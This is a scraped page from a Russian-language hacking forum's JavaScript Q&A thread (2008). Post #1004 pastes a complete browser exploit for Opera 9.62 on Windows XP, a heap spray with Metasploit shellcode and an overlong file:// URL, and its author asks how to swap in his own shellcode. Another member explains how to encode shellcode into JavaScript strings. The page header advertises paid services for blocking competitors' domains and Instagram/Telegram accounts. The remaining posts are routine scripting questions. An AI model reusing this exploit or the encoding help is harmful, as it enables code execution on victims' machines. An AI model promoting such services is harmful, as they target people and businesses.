УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование_OLD > PHP, PERL, MySQL, JavaScript
[JavaScript, AJAX] Задай вопрос, получи ответ

Страница 101 из 248

101

Опции темы

Поиск в этой теме

Опции просмотра

#1001

09.12.2008, 13:43

astrologer

Постоянный

Регистрация: 30.08.2007

Сообщений: 773

Провел на форуме:
3069349

Репутация: 808

Цитата:

Сообщение от barman

ето где Слева снизу

Вот этот пакер: http://dean.edwards.name/packer/, только он не предназначен для конвертации шелл-кода.

В JS примерно так же будет:

Код:

var code = '\x66\x81\xec\x80.....';

А уже после можно делать, что угодно - обфусцировать, сжимать, и т.п.

#1002

09.12.2008, 14:31

barman

Новичок

Регистрация: 07.12.2008

Сообщений: 6

Провел на форуме:
25363

Репутация: 0

если так писать

Код:

var code = '\x66\x81\xec\x80.....';

то код не срабатывает,
сток много шелкодов на с а как их в html страницу зкинуть

#1003

09.12.2008, 14:58

astrologer

Постоянный

Регистрация: 30.08.2007

Сообщений: 773

Провел на форуме:
3069349

Репутация: 808

Цитата:

Сообщение от barman

если так писать

Код:

var code = '\x66\x81\xec\x80.....';

то код не срабатывает,
сток много шелкодов на с а как их в html страницу зкинуть

Шеллкод и эксплоит - это не одно и то же.

#1004

09.12.2008, 15:17

barman

Новичок

Регистрация: 07.12.2008

Сообщений: 6

Провел на форуме:
25363

Репутация: 0

так я и хочу узнать как етот код в експлоит засунуть, вместо запуска калькулятора

Код:

<html>  <head><title>uh?</title></head>  <body>  <script>    	  	// k`sOSe 11/15/2008  	// tested on Windows XP SP3, opera 9.62 international version  	// vulnerability found by send9    	// there are many ways to achieve code execution, tons of function pointers to overwrite.  	// maybe there's one more reliable...    	var i=0;  	  	// push es, pop es  	var block = unescape("%u0607%u0607");     	// metasploit WinExec c:\WINDOWS\system32\calc.exe  	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");    	while (block.length < 81920) block += block;  	var memory = new Array();  	for (;i<1000;i++) memory[i] += (block + shellcode);      	var evil = "file://";            for(var i = 0; i<16438; i++)                  evil += "X";    	evil += "R.";     	window.location.replace(evil);    </script>    </body>  </html>

,
шелкод есть но в таком формате

Код:

\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3

он не выполняется

Последний раз редактировалось barman; 09.12.2008 в 15:21..

#1005

09.12.2008, 17:58

UnPazz

Участник форума

Регистрация: 30.08.2008

Сообщений: 128

Провел на форуме:
668329

Репутация: 106

используется javascript.
есть 10 файлов htm - в каждом одна новость (заголовок и текст).
можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)?
возможно ли вывести заголовки новостей на другую страницу, при нажатии на которые открывались бы сами новости?

интересует возможно ли такое сделать на javascript без php и mysql.

#1006

09.12.2008, 18:22

life_is_shit

Постоянный

Регистрация: 21.08.2007

Сообщений: 367

Провел на форуме:
3578960

Репутация: 468

Отправить сообщение для life_is_shit с помощью ICQ

да можно, аяксом=)

#1007

09.12.2008, 18:39

UnPazz

Участник форума

Регистрация: 30.08.2008

Сообщений: 128

Провел на форуме:
668329

Репутация: 106

если сервер не поддерживает php, то нужно устанавливать denwer, wamp, lamp и др.
javascript просто работает.

чтобы ajax работал, нужно ставить сервер?

#1008

09.12.2008, 18:43

astrologer

Постоянный

Регистрация: 30.08.2007

Сообщений: 773

Провел на форуме:
3069349

Репутация: 808

вот примерно такое соответствие

Код:

'\x66'
'\u0066'
decodeURI('%66')
unescape('%u0066')
String.fromCharCode(0x66)
decodeURIComponent('%66')

#1009

09.12.2008, 18:56

astrologer

Постоянный

Регистрация: 30.08.2007

Сообщений: 773

Провел на форуме:
3069349

Репутация: 808

Цитата:

Сообщение от UnPazz

Должно быть что-то, способное отдавать данные.

Цитата:

можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)?

Надо бы показывать хотя бы то, что получилось.

#1010

09.12.2008, 19:05

UnPazz

Участник форума

Регистрация: 30.08.2008

Сообщений: 128

Провел на форуме:
668329

Репутация: 106

скоро покажу.
а можно форму отправить по email без php и без использования email клиента на стороне клиента? чтобы внешне было как обычная форма?

Страница 101 из 248

101

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход